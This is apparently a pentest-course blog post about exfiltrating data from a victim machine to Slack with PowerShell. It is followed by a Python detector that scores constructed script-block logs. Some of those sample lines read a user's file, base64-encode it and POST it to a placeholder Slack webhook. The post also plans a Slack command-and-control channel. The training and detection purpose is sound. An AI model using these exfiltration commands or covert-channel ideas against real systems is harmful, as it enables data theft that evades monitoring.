Exfiltrate to Slack - PowerShell for Pentesters (PSSE)
Welcome back! This is the 8th task in the PowerShell for Pentesters course, offered by SecurityTube. For this task we were required to take data from a victim machine and post it to a third-party site, in an effort to get the data out of the target environment. I had difficulty with this script originally because most sites require the file upload to be submitted as a 'multipart/form-data' POST via a REST API, and I ran into errors when attempting to do that with Invoke-RestMethod. Therefore, on the Slack platform I used the PowerShell Invoke-RestMethod cmdlet to send a JSON body with my message encoded inside it. I can then have other bots consume and decode these messages, so I don't have to go through the traditional file-upload endpoint; that would still be nice to implement in the future for human users. That said, I also plan to compress and encrypt the exfiltrated file data, making it more readily digestible by other bots, which can decrypt and store it safely outside the target environment. Finally, the benefits of using a known-good service like Slack for covert channels are innumerable, and certainly a theme I will be revisiting with the next task: turning one of the channels into a full command-and-control protocol. You can find the Exfil-To-Slack script here, as part of the PSSE repository. In the following screenshot you can see the bot in action.
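The pattern described above (a web cmdlet posting a JSON body with an encoded payload to a Slack endpoint) is also what a defender would hunt for in PowerShell script block logs. The following is an added example, not code from the post or the PSSE repository: a small scorer that runs over constructed script block log text (Event ID 4104 style) and flags the combination of a web cmdlet, a Slack URL, a POST, and either a base64 encoding helper or a long base64-looking blob. The sample entries, the indicator weights and the severity thresholds are all assumptions chosen for illustration; real webhook paths and payloads are replaced with placeholders.

```python
import re
from dataclasses import dataclass

# Constructed script block log entries (Event ID 4104 style), not real telemetry.
# Entries 0 and 1 are benign, 2 is an ordinary webhook notification,
# 3 and 4 resemble the exfiltration pattern described in the post.
SAMPLE_SCRIPT_BLOCKS = [
    "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object",
    'Invoke-RestMethod -Uri "https://api.github.com/repos/psf/requests" -Method Get',
    'Invoke-RestMethod -Uri "https://hooks.slack.com/services/T000/B000/XXXX" -Method Post '
    '-ContentType "application/json" -Body (@{text="deploy finished"} | ConvertTo-Json)',
    '$b = [Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\\Users\\alice\\Documents\\report.xlsx")); '
    'Invoke-RestMethod -Uri "https://hooks.slack.com/services/T000/B000/XXXX" -Method Post '
    '-ContentType "application/json" -Body (@{text=$b} | ConvertTo-Json)',
    'Invoke-RestMethod -Uri "https://hooks.slack.com/services/T000/B000/XXXX" -Method Post '
    '-ContentType "application/json" -Body (@{text="' + "QUFB" * 20 + '"} | ConvertTo-Json)',
]

# Indicator rules: (name, regex, weight).  Weights are an assumption for this example.
RULES = [
    ("web_cmdlet", re.compile(r"\b(Invoke-RestMethod|Invoke-WebRequest|irm|iwr)\b", re.I), 1),
    ("slack_endpoint", re.compile(r"https://(hooks\.slack\.com/services/|slack\.com/api/|files\.slack\.com/)", re.I), 2),
    ("post_method", re.compile(r"-Method\s+Post\b", re.I), 1),
    ("encoding_helper", re.compile(r"ToBase64String|Compress-Archive|GZipStream|\[IO\.File\]::ReadAllBytes", re.I), 2),
    ("base64_blob", re.compile(r"[A-Za-z0-9+/]{64,}={0,2}"), 2),
]

HIGH_THRESHOLD = 6    # assumed: cmdlet + Slack URL + POST + encoded payload
MEDIUM_THRESHOLD = 4  # assumed: cmdlet + Slack URL + POST (plain webhook use)


@dataclass
class Finding:
    index: int
    severity: str
    score: int
    indicators: list


def score_script_block(text):
    """Return (score, matched indicator names) for one script block."""
    indicators = []
    score = 0
    for name, rx, weight in RULES:
        if rx.search(text):
            indicators.append(name)
            score += weight
    return score, indicators


def severity_for(score):
    """Map a score onto a severity bucket; 'none' means no alert."""
    if score >= HIGH_THRESHOLD:
        return "high"
    if score >= MEDIUM_THRESHOLD:
        return "medium"
    return "none"


def scan_script_blocks(blocks):
    """Scan a list of script block texts and return the findings worth alerting on."""
    findings = []
    for i, text in enumerate(blocks):
        score, indicators = score_script_block(text)
        severity = severity_for(score)
        if severity != "none":
            findings.append(Finding(i, severity, score, indicators))
    return findings


if __name__ == "__main__":
    for f in scan_script_blocks(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {f.index}: {f.severity} (score {f.score}) {', '.join(f.indicators)}")
```

Ordinary webhook notifications score medium by design; in practice those are tuned out by allowlisting the hosts or service accounts that legitimately post to Slack, while the high bucket (encoding helper or base64 blob present) is what warrants an immediate look at the originating process and the file it read.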
This script has been created for completing the requirements of the SecurityTube PowerShell for Penetration Testers Certification Exam.
Student ID: PSP-3061